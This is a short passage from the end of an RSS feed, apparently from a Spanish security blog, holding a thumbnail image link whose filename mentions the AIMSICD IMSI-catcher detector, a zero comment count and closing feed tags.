url="http://3.bp.blogspot.com/-B1MThVZKlrY/VEkowpuCUXI/AAAAAAAAbBY/dQl4pNqhQE8/s72-c/AIMSICD_ST2_seguridadparatodos.png" height="72" width="72"/><thr:total>0</thr:total></item></channel></rss>